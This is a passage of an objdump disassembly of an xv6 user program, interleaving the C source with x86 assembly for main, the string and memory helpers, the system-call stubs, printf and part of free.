2b: b9 37 08 00 00 mov $0x837,%ecx
30: eb 05 jmp 37 <main+0x37>
32: b9 39 08 00 00 mov $0x839,%ecx
37: 8b 45 f4 mov -0xc(%ebp),%eax
3a: 8d 14 85 00 00 00 00 lea 0x0(,%eax,4),%edx
41: 8b 43 04 mov 0x4(%ebx),%eax
44: 01 d0 add %edx,%eax
46: 8b 00 mov (%eax),%eax
48: 51 push %ecx
49: 50 push %eax
4a: 68 3b 08 00 00 push $0x83b
4f: 6a 01 push $0x1
51: e8 1a 04 00 00 call 470 <printf>
56: 83 c4 10 add $0x10,%esp
for(i = 1; i < argc; i++)
59: 83 45 f4 01 addl $0x1,-0xc(%ebp)
5d: 8b 45 f4 mov -0xc(%ebp),%eax
60: 3b 03 cmp (%ebx),%eax
62: 7c bd jl 21 <main+0x21>
exit();
64: e8 7b 02 00 00 call 2e4 <exit>
00000069 <stosb>:
: "cc");
}
static inline void
stosb(void *addr, int data, int cnt)
{
69: 55 push %ebp
6a: 89 e5 mov %esp,%ebp
6c: 57 push %edi
6d: 53 push %ebx
asm volatile("cld; rep stosb"
6e: 8b 4d 08 mov 0x8(%ebp),%ecx
71: 8b 55 10 mov 0x10(%ebp),%edx
74: 8b 45 0c mov 0xc(%ebp),%eax
77: 89 cb mov %ecx,%ebx
79: 89 df mov %ebx,%edi
7b: 89 d1 mov %edx,%ecx
7d: fc cld
7e: f3 aa rep stos %al,%es:(%edi)
80: 89 ca mov %ecx,%edx
82: 89 fb mov %edi,%ebx
84: 89 5d 08 mov %ebx,0x8(%ebp)
87: 89 55 10 mov %edx,0x10(%ebp)
: "=D"(addr), "=c"(cnt)
: "0"(addr), "1"(cnt), "a"(data)
: "memory", "cc");
}
8a: 90 nop
8b: 5b pop %ebx
8c: 5f pop %edi
8d: 5d pop %ebp
8e: c3 ret
0000008f <strcpy>:
#include "user.h"
#include "x86.h"
char*
strcpy(char *s, const char *t)
{
8f: f3 0f 1e fb endbr32
93: 55 push %ebp
94: 89 e5 mov %esp,%ebp
96: 83 ec 10 sub $0x10,%esp
char *os;
os = s;
99: 8b 45 08 mov 0x8(%ebp),%eax
9c: 89 45 fc mov %eax,-0x4(%ebp)
while((*s++ = *t++) != 0)
9f: 90 nop
a0: 8b 55 0c mov 0xc(%ebp),%edx
a3: 8d 42 01 lea 0x1(%edx),%eax
a6: 89 45 0c mov %eax,0xc(%ebp)
a9: 8b 45 08 mov 0x8(%ebp),%eax
ac: 8d 48 01 lea 0x1(%eax),%ecx
af: 89 4d 08 mov %ecx,0x8(%ebp)
b2: 0f b6 12 movzbl (%edx),%edx
b5: 88 10 mov %dl,(%eax)
b7: 0f b6 00 movzbl (%eax),%eax
ba: 84 c0 test %al,%al
bc: 75 e2 jne a0 <strcpy+0x11>
;
return os;
be: 8b 45 fc mov -0x4(%ebp),%eax
}
c1: c9 leave
c2: c3 ret
000000c3 <strcmp>:
int
strcmp(const char *p, const char *q)
{
c3: f3 0f 1e fb endbr32
c7: 55 push %ebp
c8: 89 e5 mov %esp,%ebp
while(*p && *p == *q)
ca: eb 08 jmp d4 <strcmp+0x11>
p++, q++;
cc: 83 45 08 01 addl $0x1,0x8(%ebp)
d0: 83 45 0c 01 addl $0x1,0xc(%ebp)
while(*p && *p == *q)
d4: 8b 45 08 mov 0x8(%ebp),%eax
d7: 0f b6 00 movzbl (%eax),%eax
da: 84 c0 test %al,%al
dc: 74 10 je ee <strcmp+0x2b>
de: 8b 45 08 mov 0x8(%ebp),%eax
e1: 0f b6 10 movzbl (%eax),%edx
e4: 8b 45 0c mov 0xc(%ebp),%eax
e7: 0f b6 00 movzbl (%eax),%eax
ea: 38 c2 cmp %al,%dl
ec: 74 de je cc <strcmp+0x9>
return (uchar)*p - (uchar)*q;
ee: 8b 45 08 mov 0x8(%ebp),%eax
f1: 0f b6 00 movzbl (%eax),%eax
f4: 0f b6 d0 movzbl %al,%edx
f7: 8b 45 0c mov 0xc(%ebp),%eax
fa: 0f b6 00 movzbl (%eax),%eax
fd: 0f b6 c0 movzbl %al,%eax
100: 29 c2 sub %eax,%edx
102: 89 d0 mov %edx,%eax
}
104: 5d pop %ebp
105: c3 ret
00000106 <strlen>:
uint
strlen(const char *s)
{
106: f3 0f 1e fb endbr32
10a: 55 push %ebp
10b: 89 e5 mov %esp,%ebp
10d: 83 ec 10 sub $0x10,%esp
int n;
for(n = 0; s[n]; n++)
110: c7 45 fc 00 00 00 00 movl $0x0,-0x4(%ebp)
117: eb 04 jmp 11d <strlen+0x17>
119: 83 45 fc 01 addl $0x1,-0x4(%ebp)
11d: 8b 55 fc mov -0x4(%ebp),%edx
120: 8b 45 08 mov 0x8(%ebp),%eax
123: 01 d0 add %edx,%eax
125: 0f b6 00 movzbl (%eax),%eax
128: 84 c0 test %al,%al
12a: 75 ed jne 119 <strlen+0x13>
;
return n;
12c: 8b 45 fc mov -0x4(%ebp),%eax
}
12f: c9 leave
130: c3 ret
00000131 <memset>:
void*
memset(void *dst, int c, uint n)
{
131: f3 0f 1e fb endbr32
135: 55 push %ebp
136: 89 e5 mov %esp,%ebp
stosb(dst, c, n);
138: 8b 45 10 mov 0x10(%ebp),%eax
13b: 50 push %eax
13c: ff 75 0c pushl 0xc(%ebp)
13f: ff 75 08 pushl 0x8(%ebp)
142: e8 22 ff ff ff call 69 <stosb>
147: 83 c4 0c add $0xc,%esp
return dst;
14a: 8b 45 08 mov 0x8(%ebp),%eax
}
14d: c9 leave
14e: c3 ret
0000014f <strchr>:
char*
strchr(const char *s, char c)
{
14f: f3 0f 1e fb endbr32
153: 55 push %ebp
154: 89 e5 mov %esp,%ebp
156: 83 ec 04 sub $0x4,%esp
159: 8b 45 0c mov 0xc(%ebp),%eax
15c: 88 45 fc mov %al,-0x4(%ebp)
for(; *s; s++)
15f: eb 14 jmp 175 <strchr+0x26>
if(*s == c)
161: 8b 45 08 mov 0x8(%ebp),%eax
164: 0f b6 00 movzbl (%eax),%eax
167: 38 45 fc cmp %al,-0x4(%ebp)
16a: 75 05 jne 171 <strchr+0x22>
return (char*)s;
16c: 8b 45 08 mov 0x8(%ebp),%eax
16f: eb 13 jmp 184 <strchr+0x35>
for(; *s; s++)
171: 83 45 08 01 addl $0x1,0x8(%ebp)
175: 8b 45 08 mov 0x8(%ebp),%eax
178: 0f b6 00 movzbl (%eax),%eax
17b: 84 c0 test %al,%al
17d: 75 e2 jne 161 <strchr+0x12>
return 0;
17f: b8 00 00 00 00 mov $0x0,%eax
}
184: c9 leave
185: c3 ret
00000186 <gets>:
char*
gets(char *buf, int max)
{
186: f3 0f 1e fb endbr32
18a: 55 push %ebp
18b: 89 e5 mov %esp,%ebp
18d: 83 ec 18 sub $0x18,%esp
int i, cc;
char c;
for(i=0; i+1 < max; ){
190: c7 45 f4 00 00 00 00 movl $0x0,-0xc(%ebp)
197: eb 42 jmp 1db <gets+0x55>
cc = read(0, &c, 1);
199: 83 ec 04 sub $0x4,%esp
19c: 6a 01 push $0x1
19e: 8d 45 ef lea -0x11(%ebp),%eax
1a1: 50 push %eax
1a2: 6a 00 push $0x0
1a4: e8 53 01 00 00 call 2fc <read>
1a9: 83 c4 10 add $0x10,%esp
1ac: 89 45 f0 mov %eax,-0x10(%ebp)
if(cc < 1)
1af: 83 7d f0 00 cmpl $0x0,-0x10(%ebp)
1b3: 7e 33 jle 1e8 <gets+0x62>
break;
buf[i++] = c;
1b5: 8b 45 f4 mov -0xc(%ebp),%eax
1b8: 8d 50 01 lea 0x1(%eax),%edx
1bb: 89 55 f4 mov %edx,-0xc(%ebp)
1be: 89 c2 mov %eax,%edx
1c0: 8b 45 08 mov 0x8(%ebp),%eax
1c3: 01 c2 add %eax,%edx
1c5: 0f b6 45 ef movzbl -0x11(%ebp),%eax
1c9: 88 02 mov %al,(%edx)
if(c == '\n' || c == '\r')
1cb: 0f b6 45 ef movzbl -0x11(%ebp),%eax
1cf: 3c 0a cmp $0xa,%al
1d1: 74 16 je 1e9 <gets+0x63>
1d3: 0f b6 45 ef movzbl -0x11(%ebp),%eax
1d7: 3c 0d cmp $0xd,%al
1d9: 74 0e je 1e9 <gets+0x63>
for(i=0; i+1 < max; ){
1db: 8b 45 f4 mov -0xc(%ebp),%eax
1de: 83 c0 01 add $0x1,%eax
1e1: 39 45 0c cmp %eax,0xc(%ebp)
1e4: 7f b3 jg 199 <gets+0x13>
1e6: eb 01 jmp 1e9 <gets+0x63>
break;
1e8: 90 nop
break;
}
buf[i] = '\0';
1e9: 8b 55 f4 mov -0xc(%ebp),%edx
1ec: 8b 45 08 mov 0x8(%ebp),%eax
1ef: 01 d0 add %edx,%eax
1f1: c6 00 00 movb $0x0,(%eax)
return buf;
1f4: 8b 45 08 mov 0x8(%ebp),%eax
}
1f7: c9 leave
1f8: c3 ret
000001f9 <stat>:
int
stat(const char *n, struct stat *st)
{
1f9: f3 0f 1e fb endbr32
1fd: 55 push %ebp
1fe: 89 e5 mov %esp,%ebp
200: 83 ec 18 sub $0x18,%esp
int fd;
int r;
fd = open(n, O_RDONLY);
203: 83 ec 08 sub $0x8,%esp
206: 6a 00 push $0x0
208: ff 75 08 pushl 0x8(%ebp)
20b: e8 14 01 00 00 call 324 <open>
210: 83 c4 10 add $0x10,%esp
213: 89 45 f4 mov %eax,-0xc(%ebp)
if(fd < 0)
216: 83 7d f4 00 cmpl $0x0,-0xc(%ebp)
21a: 79 07 jns 223 <stat+0x2a>
return -1;
21c: b8 ff ff ff ff mov $0xffffffff,%eax
221: eb 25 jmp 248 <stat+0x4f>
r = fstat(fd, st);
223: 83 ec 08 sub $0x8,%esp
226: ff 75 0c pushl 0xc(%ebp)
229: ff 75 f4 pushl -0xc(%ebp)
22c: e8 0b 01 00 00 call 33c <fstat>
231: 83 c4 10 add $0x10,%esp
234: 89 45 f0 mov %eax,-0x10(%ebp)
close(fd);
237: 83 ec 0c sub $0xc,%esp
23a: ff 75 f4 pushl -0xc(%ebp)
23d: e8 ca 00 00 00 call 30c <close>
242: 83 c4 10 add $0x10,%esp
return r;
245: 8b 45 f0 mov -0x10(%ebp),%eax
}
248: c9 leave
249: c3 ret
0000024a <atoi>:
int
atoi(const char *s)
{
24a: f3 0f 1e fb endbr32
24e: 55 push %ebp
24f: 89 e5 mov %esp,%ebp
251: 83 ec 10 sub $0x10,%esp
int n;
n = 0;
254: c7 45 fc 00 00 00 00 movl $0x0,-0x4(%ebp)
while('0' <= *s && *s <= '9')
25b: eb 25 jmp 282 <atoi+0x38>
n = n*10 + *s++ - '0';
25d: 8b 55 fc mov -0x4(%ebp),%edx
260: 89 d0 mov %edx,%eax
262: c1 e0 02 shl $0x2,%eax
265: 01 d0 add %edx,%eax
267: 01 c0 add %eax,%eax
269: 89 c1 mov %eax,%ecx
26b: 8b 45 08 mov 0x8(%ebp),%eax
26e: 8d 50 01 lea 0x1(%eax),%edx
271: 89 55 08 mov %edx,0x8(%ebp)
274: 0f b6 00 movzbl (%eax),%eax
277: 0f be c0 movsbl %al,%eax
27a: 01 c8 add %ecx,%eax
27c: 83 e8 30 sub $0x30,%eax
27f: 89 45 fc mov %eax,-0x4(%ebp)
while('0' <= *s && *s <= '9')
282: 8b 45 08 mov 0x8(%ebp),%eax
285: 0f b6 00 movzbl (%eax),%eax
288: 3c 2f cmp $0x2f,%al
28a: 7e 0a jle 296 <atoi+0x4c>
28c: 8b 45 08 mov 0x8(%ebp),%eax
28f: 0f b6 00 movzbl (%eax),%eax
292: 3c 39 cmp $0x39,%al
294: 7e c7 jle 25d <atoi+0x13>
return n;
296: 8b 45 fc mov -0x4(%ebp),%eax
}
299: c9 leave
29a: c3 ret
0000029b <memmove>:
void*
memmove(void *vdst, const void *vsrc, int n)
{
29b: f3 0f 1e fb endbr32
29f: 55 push %ebp
2a0: 89 e5 mov %esp,%ebp
2a2: 83 ec 10 sub $0x10,%esp
char *dst;
const char *src;
dst = vdst;
2a5: 8b 45 08 mov 0x8(%ebp),%eax
2a8: 89 45 fc mov %eax,-0x4(%ebp)
src = vsrc;
2ab: 8b 45 0c mov 0xc(%ebp),%eax
2ae: 89 45 f8 mov %eax,-0x8(%ebp)
while(n-- > 0)
2b1: eb 17 jmp 2ca <memmove+0x2f>
*dst++ = *src++;
2b3: 8b 55 f8 mov -0x8(%ebp),%edx
2b6: 8d 42 01 lea 0x1(%edx),%eax
2b9: 89 45 f8 mov %eax,-0x8(%ebp)
2bc: 8b 45 fc mov -0x4(%ebp),%eax
2bf: 8d 48 01 lea 0x1(%eax),%ecx
2c2: 89 4d fc mov %ecx,-0x4(%ebp)
2c5: 0f b6 12 movzbl (%edx),%edx
2c8: 88 10 mov %dl,(%eax)
while(n-- > 0)
2ca: 8b 45 10 mov 0x10(%ebp),%eax
2cd: 8d 50 ff lea -0x1(%eax),%edx
2d0: 89 55 10 mov %edx,0x10(%ebp)
2d3: 85 c0 test %eax,%eax
2d5: 7f dc jg 2b3 <memmove+0x18>
return vdst;
2d7: 8b 45 08 mov 0x8(%ebp),%eax
}
2da: c9 leave
2db: c3 ret
000002dc <fork>:
name: \
movl $SYS_ ## name, %eax; \
int $T_SYSCALL; \
ret
SYSCALL(fork)
2dc: b8 01 00 00 00 mov $0x1,%eax
2e1: cd 40 int $0x40
2e3: c3 ret
000002e4 <exit>:
SYSCALL(exit)
2e4: b8 02 00 00 00 mov $0x2,%eax
2e9: cd 40 int $0x40
2eb: c3 ret
000002ec <wait>:
SYSCALL(wait)
2ec: b8 03 00 00 00 mov $0x3,%eax
2f1: cd 40 int $0x40
2f3: c3 ret
000002f4 <pipe>:
SYSCALL(pipe)
2f4: b8 04 00 00 00 mov $0x4,%eax
2f9: cd 40 int $0x40
2fb: c3 ret
000002fc <read>:
SYSCALL(read)
2fc: b8 05 00 00 00 mov $0x5,%eax
301: cd 40 int $0x40
303: c3 ret
00000304 <write>:
SYSCALL(write)
304: b8 10 00 00 00 mov $0x10,%eax
309: cd 40 int $0x40
30b: c3 ret
0000030c <close>:
SYSCALL(close)
30c: b8 15 00 00 00 mov $0x15,%eax
311: cd 40 int $0x40
313: c3 ret
00000314 <kill>:
SYSCALL(kill)
314: b8 06 00 00 00 mov $0x6,%eax
319: cd 40 int $0x40
31b: c3 ret
0000031c <exec>:
SYSCALL(exec)
31c: b8 07 00 00 00 mov $0x7,%eax
321: cd 40 int $0x40
323: c3 ret
00000324 <open>:
SYSCALL(open)
324: b8 0f 00 00 00 mov $0xf,%eax
329: cd 40 int $0x40
32b: c3 ret
0000032c <mknod>:
SYSCALL(mknod)
32c: b8 11 00 00 00 mov $0x11,%eax
331: cd 40 int $0x40
333: c3 ret
00000334 <unlink>:
SYSCALL(unlink)
334: b8 12 00 00 00 mov $0x12,%eax
339: cd 40 int $0x40
33b: c3 ret
0000033c <fstat>:
SYSCALL(fstat)
33c: b8 08 00 00 00 mov $0x8,%eax
341: cd 40 int $0x40
343: c3 ret
00000344 <link>:
SYSCALL(link)
344: b8 13 00 00 00 mov $0x13,%eax
349: cd 40 int $0x40
34b: c3 ret
0000034c <mkdir>:
SYSCALL(mkdir)
34c: b8 14 00 00 00 mov $0x14,%eax
351: cd 40 int $0x40
353: c3 ret
00000354 <chdir>:
SYSCALL(chdir)
354: b8 09 00 00 00 mov $0x9,%eax
359: cd 40 int $0x40
35b: c3 ret
0000035c <dup>:
SYSCALL(dup)
35c: b8 0a 00 00 00 mov $0xa,%eax
361: cd 40 int $0x40
363: c3 ret
00000364 <getpid>:
SYSCALL(getpid)
364: b8 0b 00 00 00 mov $0xb,%eax
369: cd 40 int $0x40
36b: c3 ret
0000036c <sbrk>:
SYSCALL(sbrk)
36c: b8 0c 00 00 00 mov $0xc,%eax
371: cd 40 int $0x40
373: c3 ret
00000374 <sleep>:
SYSCALL(sleep)
374: b8 0d 00 00 00 mov $0xd,%eax
379: cd 40 int $0x40
37b: c3 ret
0000037c <uptime>:
SYSCALL(uptime)
37c: b8 0e 00 00 00 mov $0xe,%eax
381: cd 40 int $0x40
383: c3 ret
00000384 <cps>:
SYSCALL(cps)
384: b8 16 00 00 00 mov $0x16,%eax
389: cd 40 int $0x40
38b: c3 ret
0000038c <cdate>:
38c: b8 17 00 00 00 mov $0x17,%eax
391: cd 40 int $0x40
393: c3 ret
00000394 <putc>:
#include "stat.h"
#include "user.h"
static void
putc(int fd, char c)
{
394: f3 0f 1e fb endbr32
398: 55 push %ebp
399: 89 e5 mov %esp,%ebp
39b: 83 ec 18 sub $0x18,%esp
39e: 8b 45 0c mov 0xc(%ebp),%eax
3a1: 88 45 f4 mov %al,-0xc(%ebp)
write(fd, &c, 1);
3a4: 83 ec 04 sub $0x4,%esp
3a7: 6a 01 push $0x1
3a9: 8d 45 f4 lea -0xc(%ebp),%eax
3ac: 50 push %eax
3ad: ff 75 08 pushl 0x8(%ebp)
3b0: e8 4f ff ff ff call 304 <write>
3b5: 83 c4 10 add $0x10,%esp
}
3b8: 90 nop
3b9: c9 leave
3ba: c3 ret
000003bb <printint>:
static void
printint(int fd, int xx, int base, int sgn)
{
3bb: f3 0f 1e fb endbr32
3bf: 55 push %ebp
3c0: 89 e5 mov %esp,%ebp
3c2: 83 ec 28 sub $0x28,%esp
static char digits[] = "0123456789ABCDEF";
char buf[16];
int i, neg;
uint x;
neg = 0;
3c5: c7 45 f0 00 00 00 00 movl $0x0,-0x10(%ebp)
if(sgn && xx < 0){
3cc: 83 7d 14 00 cmpl $0x0,0x14(%ebp)
3d0: 74 17 je 3e9 <printint+0x2e>
3d2: 83 7d 0c 00 cmpl $0x0,0xc(%ebp)
3d6: 79 11 jns 3e9 <printint+0x2e>
neg = 1;
3d8: c7 45 f0 01 00 00 00 movl $0x1,-0x10(%ebp)
x = -xx;
3df: 8b 45 0c mov 0xc(%ebp),%eax
3e2: f7 d8 neg %eax
3e4: 89 45 ec mov %eax,-0x14(%ebp)
3e7: eb 06 jmp 3ef <printint+0x34>
} else {
x = xx;
3e9: 8b 45 0c mov 0xc(%ebp),%eax
3ec: 89 45 ec mov %eax,-0x14(%ebp)
}
i = 0;
3ef: c7 45 f4 00 00 00 00 movl $0x0,-0xc(%ebp)
do{
buf[i++] = digits[x % base];
3f6: 8b 4d 10 mov 0x10(%ebp),%ecx
3f9: 8b 45 ec mov -0x14(%ebp),%eax
3fc: ba 00 00 00 00 mov $0x0,%edx
401: f7 f1 div %ecx
403: 89 d1 mov %edx,%ecx
405: 8b 45 f4 mov -0xc(%ebp),%eax
408: 8d 50 01 lea 0x1(%eax),%edx
40b: 89 55 f4 mov %edx,-0xc(%ebp)
40e: 0f b6 91 90 0a 00 00 movzbl 0xa90(%ecx),%edx
415: 88 54 05 dc mov %dl,-0x24(%ebp,%eax,1)
}while((x /= base) != 0);
419: 8b 4d 10 mov 0x10(%ebp),%ecx
41c: 8b 45 ec mov -0x14(%ebp),%eax
41f: ba 00 00 00 00 mov $0x0,%edx
424: f7 f1 div %ecx
426: 89 45 ec mov %eax,-0x14(%ebp)
429: 83 7d ec 00 cmpl $0x0,-0x14(%ebp)
42d: 75 c7 jne 3f6 <printint+0x3b>
if(neg)
42f: 83 7d f0 00 cmpl $0x0,-0x10(%ebp)
433: 74 2d je 462 <printint+0xa7>
buf[i++] = '-';
435: 8b 45 f4 mov -0xc(%ebp),%eax
438: 8d 50 01 lea 0x1(%eax),%edx
43b: 89 55 f4 mov %edx,-0xc(%ebp)
43e: c6 44 05 dc 2d movb $0x2d,-0x24(%ebp,%eax,1)
while(--i >= 0)
443: eb 1d jmp 462 <printint+0xa7>
putc(fd, buf[i]);
445: 8d 55 dc lea -0x24(%ebp),%edx
448: 8b 45 f4 mov -0xc(%ebp),%eax
44b: 01 d0 add %edx,%eax
44d: 0f b6 00 movzbl (%eax),%eax
450: 0f be c0 movsbl %al,%eax
453: 83 ec 08 sub $0x8,%esp
456: 50 push %eax
457: ff 75 08 pushl 0x8(%ebp)
45a: e8 35 ff ff ff call 394 <putc>
45f: 83 c4 10 add $0x10,%esp
while(--i >= 0)
462: 83 6d f4 01 subl $0x1,-0xc(%ebp)
466: 83 7d f4 00 cmpl $0x0,-0xc(%ebp)
46a: 79 d9 jns 445 <printint+0x8a>
}
46c: 90 nop
46d: 90 nop
46e: c9 leave
46f: c3 ret
00000470 <printf>:
// Print to the given fd. Only understands %d, %x, %p, %s.
void
printf(int fd, const char *fmt, ...)
{
470: f3 0f 1e fb endbr32
474: 55 push %ebp
475: 89 e5 mov %esp,%ebp
477: 83 ec 28 sub $0x28,%esp
char *s;
int c, i, state;
uint *ap;
state = 0;
47a: c7 45 ec 00 00 00 00 movl $0x0,-0x14(%ebp)
ap = (uint*)(void*)&fmt + 1;
481: 8d 45 0c lea 0xc(%ebp),%eax
484: 83 c0 04 add $0x4,%eax
487: 89 45 e8 mov %eax,-0x18(%ebp)
for(i = 0; fmt[i]; i++){
48a: c7 45 f0 00 00 00 00 movl $0x0,-0x10(%ebp)
491: e9 59 01 00 00 jmp 5ef <printf+0x17f>
c = fmt[i] & 0xff;
496: 8b 55 0c mov 0xc(%ebp),%edx
499: 8b 45 f0 mov -0x10(%ebp),%eax
49c: 01 d0 add %edx,%eax
49e: 0f b6 00 movzbl (%eax),%eax
4a1: 0f be c0 movsbl %al,%eax
4a4: 25 ff 00 00 00 and $0xff,%eax
4a9: 89 45 e4 mov %eax,-0x1c(%ebp)
if(state == 0){
4ac: 83 7d ec 00 cmpl $0x0,-0x14(%ebp)
4b0: 75 2c jne 4de <printf+0x6e>
if(c == '%'){
4b2: 83 7d e4 25 cmpl $0x25,-0x1c(%ebp)
4b6: 75 0c jne 4c4 <printf+0x54>
state = '%';
4b8: c7 45 ec 25 00 00 00 movl $0x25,-0x14(%ebp)
4bf: e9 27 01 00 00 jmp 5eb <printf+0x17b>
} else {
putc(fd, c);
4c4: 8b 45 e4 mov -0x1c(%ebp),%eax
4c7: 0f be c0 movsbl %al,%eax
4ca: 83 ec 08 sub $0x8,%esp
4cd: 50 push %eax
4ce: ff 75 08 pushl 0x8(%ebp)
4d1: e8 be fe ff ff call 394 <putc>
4d6: 83 c4 10 add $0x10,%esp
4d9: e9 0d 01 00 00 jmp 5eb <printf+0x17b>
}
} else if(state == '%'){
4de: 83 7d ec 25 cmpl $0x25,-0x14(%ebp)
4e2: 0f 85 03 01 00 00 jne 5eb <printf+0x17b>
if(c == 'd'){
4e8: 83 7d e4 64 cmpl $0x64,-0x1c(%ebp)
4ec: 75 1e jne 50c <printf+0x9c>
printint(fd, *ap, 10, 1);
4ee: 8b 45 e8 mov -0x18(%ebp),%eax
4f1: 8b 00 mov (%eax),%eax
4f3: 6a 01 push $0x1
4f5: 6a 0a push $0xa
4f7: 50 push %eax
4f8: ff 75 08 pushl 0x8(%ebp)
4fb: e8 bb fe ff ff call 3bb <printint>
500: 83 c4 10 add $0x10,%esp
ap++;
503: 83 45 e8 04 addl $0x4,-0x18(%ebp)
507: e9 d8 00 00 00 jmp 5e4 <printf+0x174>
} else if(c == 'x' || c == 'p'){
50c: 83 7d e4 78 cmpl $0x78,-0x1c(%ebp)
510: 74 06 je 518 <printf+0xa8>
512: 83 7d e4 70 cmpl $0x70,-0x1c(%ebp)
516: 75 1e jne 536 <printf+0xc6>
printint(fd, *ap, 16, 0);
518: 8b 45 e8 mov -0x18(%ebp),%eax
51b: 8b 00 mov (%eax),%eax
51d: 6a 00 push $0x0
51f: 6a 10 push $0x10
521: 50 push %eax
522: ff 75 08 pushl 0x8(%ebp)
525: e8 91 fe ff ff call 3bb <printint>
52a: 83 c4 10 add $0x10,%esp
ap++;
52d: 83 45 e8 04 addl $0x4,-0x18(%ebp)
531: e9 ae 00 00 00 jmp 5e4 <printf+0x174>
} else if(c == 's'){
536: 83 7d e4 73 cmpl $0x73,-0x1c(%ebp)
53a: 75 43 jne 57f <printf+0x10f>
s = (char*)*ap;
53c: 8b 45 e8 mov -0x18(%ebp),%eax
53f: 8b 00 mov (%eax),%eax
541: 89 45 f4 mov %eax,-0xc(%ebp)
ap++;
544: 83 45 e8 04 addl $0x4,-0x18(%ebp)
if(s == 0)
548: 83 7d f4 00 cmpl $0x0,-0xc(%ebp)
54c: 75 25 jne 573 <printf+0x103>
s = "(null)";
54e: c7 45 f4 40 08 00 00 movl $0x840,-0xc(%ebp)
while(*s != 0){
555: eb 1c jmp 573 <printf+0x103>
putc(fd, *s);
557: 8b 45 f4 mov -0xc(%ebp),%eax
55a: 0f b6 00 movzbl (%eax),%eax
55d: 0f be c0 movsbl %al,%eax
560: 83 ec 08 sub $0x8,%esp
563: 50 push %eax
564: ff 75 08 pushl 0x8(%ebp)
567: e8 28 fe ff ff call 394 <putc>
56c: 83 c4 10 add $0x10,%esp
s++;
56f: 83 45 f4 01 addl $0x1,-0xc(%ebp)
while(*s != 0){
573: 8b 45 f4 mov -0xc(%ebp),%eax
576: 0f b6 00 movzbl (%eax),%eax
579: 84 c0 test %al,%al
57b: 75 da jne 557 <printf+0xe7>
57d: eb 65 jmp 5e4 <printf+0x174>
}
} else if(c == 'c'){
57f: 83 7d e4 63 cmpl $0x63,-0x1c(%ebp)
583: 75 1d jne 5a2 <printf+0x132>
putc(fd, *ap);
585: 8b 45 e8 mov -0x18(%ebp),%eax
588: 8b 00 mov (%eax),%eax
58a: 0f be c0 movsbl %al,%eax
58d: 83 ec 08 sub $0x8,%esp
590: 50 push %eax
591: ff 75 08 pushl 0x8(%ebp)
594: e8 fb fd ff ff call 394 <putc>
599: 83 c4 10 add $0x10,%esp
ap++;
59c: 83 45 e8 04 addl $0x4,-0x18(%ebp)
5a0: eb 42 jmp 5e4 <printf+0x174>
} else if(c == '%'){
5a2: 83 7d e4 25 cmpl $0x25,-0x1c(%ebp)
5a6: 75 17 jne 5bf <printf+0x14f>
putc(fd, c);
5a8: 8b 45 e4 mov -0x1c(%ebp),%eax
5ab: 0f be c0 movsbl %al,%eax
5ae: 83 ec 08 sub $0x8,%esp
5b1: 50 push %eax
5b2: ff 75 08 pushl 0x8(%ebp)
5b5: e8 da fd ff ff call 394 <putc>
5ba: 83 c4 10 add $0x10,%esp
5bd: eb 25 jmp 5e4 <printf+0x174>
} else {
// Unknown % sequence. Print it to draw attention.
putc(fd, '%');
5bf: 83 ec 08 sub $0x8,%esp
5c2: 6a 25 push $0x25
5c4: ff 75 08 pushl 0x8(%ebp)
5c7: e8 c8 fd ff ff call 394 <putc>
5cc: 83 c4 10 add $0x10,%esp
putc(fd, c);
5cf: 8b 45 e4 mov -0x1c(%ebp),%eax
5d2: 0f be c0 movsbl %al,%eax
5d5: 83 ec 08 sub $0x8,%esp
5d8: 50 push %eax
5d9: ff 75 08 pushl 0x8(%ebp)
5dc: e8 b3 fd ff ff call 394 <putc>
5e1: 83 c4 10 add $0x10,%esp
}
state = 0;
5e4: c7 45 ec 00 00 00 00 movl $0x0,-0x14(%ebp)
for(i = 0; fmt[i]; i++){
5eb: 83 45 f0 01 addl $0x1,-0x10(%ebp)
5ef: 8b 55 0c mov 0xc(%ebp),%edx
5f2: 8b 45 f0 mov -0x10(%ebp),%eax
5f5: 01 d0 add %edx,%eax
5f7: 0f b6 00 movzbl (%eax),%eax
5fa: 84 c0 test %al,%al
5fc: 0f 85 94 fe ff ff jne 496 <printf+0x26>
}
}
}
602: 90 nop
603: 90 nop
604: c9 leave
605: c3 ret
00000606 <free>:
static Header base;
static Header *freep;
void
free(void *ap)
{
606: f3 0f 1e fb endbr32
60a: 55 push %ebp
60b: 89 e5 mov %esp,%ebp
60d: 83 ec 10 sub $0x10,%esp
Header *bp, *p;
bp = (Header*)ap - 1;
610: 8b 45 08 mov 0x8(%ebp),%eax
613: 83 e8 08 sub $0x8,%eax
616: 89 45 f8 mov %eax,-0x8(%ebp)
for(p = freep; !(bp > p && bp < p->s.ptr); p = p->s.ptr)
619: a1 ac 0a 00 00 mov 0xaac,%eax
61e: 89 45 fc mov %eax,-0x4(%ebp)
621: eb 24 jmp 647 <free+0x41>
if(p >= p->s.ptr && (bp > p || bp < p->s.ptr))
623: 8b 45 fc mov -0x4(%ebp),%eax
626: 8b 00 mov (%eax),%eax
628: 39 45 fc cmp %eax,-0x4(%ebp)
62b: 72 12 jb 63f <free+0x39>
62d: 8b 45 f8 mov -0x8(%ebp),%eax
630: 3b 45 fc cmp -0x4(%ebp),%eax
633: 77 24 ja 659 <free+0x53>
635: 8b 45 fc mov -0x4(%ebp),%eax
638: 8b 00 mov (%eax),%eax
63a: 39 45 f8 cmp %eax,-0x8(%ebp)
63d: 72 1a jb 659 <free+0x53>
for(p = freep; !(bp > p && bp < p->s.ptr); p = p->s.ptr)
63f: 8b 45 fc mov -0x4(%ebp),%eax
642: 8b 00 mov (%eax),%eax
644: 89 45 fc mov %eax,-0x4(%ebp)
647: 8b 45 f8 mov -0x8(%ebp),%eax
64a: 3b 45 fc cmp -0x4(%ebp),%eax
64d: 76 d4 jbe 623 <free+0x1d>
64f: 8b 45 fc mov -0x4(%ebp),%eax
652: 8b 00 mov (%eax),%eax
654: 39 45 f8 cmp %eax,-0x8(%ebp)
657: 73 ca jae 623 <free+0x1d>
break;
if(bp + bp->s.size == p->s.ptr){
659: 8b 45 f8 mov -0x8(%ebp),%eax
65c: 8b 40 04 mov 0x4(%eax),%eax
65f: 8d 14 c5 00 00 00 00 lea 0x0(,%eax,8),%edx
666: 8b 45 f8 mov -0x8(%ebp),%eax
669: 01 c2 add %eax,%edx
66b: 8b 45 fc mov -0x4(%ebp),%eax
66e: 8b 00 mov (%eax),%eax
670: 39 c2 cmp %eax,%edx
672: 75 24 jne 698 <free+0x92>
bp->s.size += p->s.ptr->s.size;
674: 8b 45 f8 mov -0x8(%ebp),%eax
677: 8b 50 04 mov 0x4(%eax),%edx
67a: 8b 45 fc mov -0x4(%ebp),%eax
